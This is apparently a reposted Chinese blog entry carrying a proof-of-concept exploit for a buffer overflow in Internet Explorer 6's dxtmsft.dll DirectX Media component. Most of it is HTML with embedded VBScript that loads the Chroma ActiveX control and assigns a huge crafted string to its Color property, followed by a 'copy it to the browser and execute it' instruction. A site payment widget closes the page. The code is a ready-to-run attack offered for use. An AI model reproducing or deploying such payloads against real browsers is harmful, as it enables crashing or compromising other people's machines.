MS Internet Explorer 6 DirectX Media Remote Overflow DoS Exploit

本文提供了一个针对dxtmsft.dll DirectX Media Image Transforms组件的远程缓冲区溢出漏洞利用示例。该漏洞影响版本为6.00.2900.2180的DirectX Media Image Transforms DLL。文中包含了一个利用该漏洞的概念验证代码。
This a Poc Html code,Just copy it to the browser and execute it:


<!--============================================================================
dxtmsft.dll Remote Buffer Overflow Exploit
Internet Explorer ver 6.0
DeltahackingSecurityTEAM
Bug discovered by Dr.Pantagon
Affected Software: dxtmsft.dll  (DirectX Media -- Image DirectX Transforms)
DLL VER : 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)
Company Dll : Microsoft? Windows? Operating System
path : C:\WINDOWS\system32\dxtmsft.dll
all software that use this ocx are vulnerable to this exploits.
www.Deltahacking.net
www.Deltasecurity.ir
==============================================================================-->

<object classid="clsid:421516C1-3CF8-11D2-952A-00C04FA34F05" id="Chroma"></object>

<input language=VBScript onclick=jojo() type=button value="Click here to start Exploit"><script language='vbscript'>
Sub jojo
  buff = String(999999, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaA")

  get_EDX = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbcccccccccccccddddddddddeee"

  buff1 = String(999999, "BBBBBBBBBBBBBBBBBBBBBBBBBBBBbb")

  egg = buff + get_EDX + buff1 + scode

  Chroma.Color = egg
End Sub
</script>

转载于:https://www.cnblogs.com/allyesno/archive/2007/08/07/846843.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值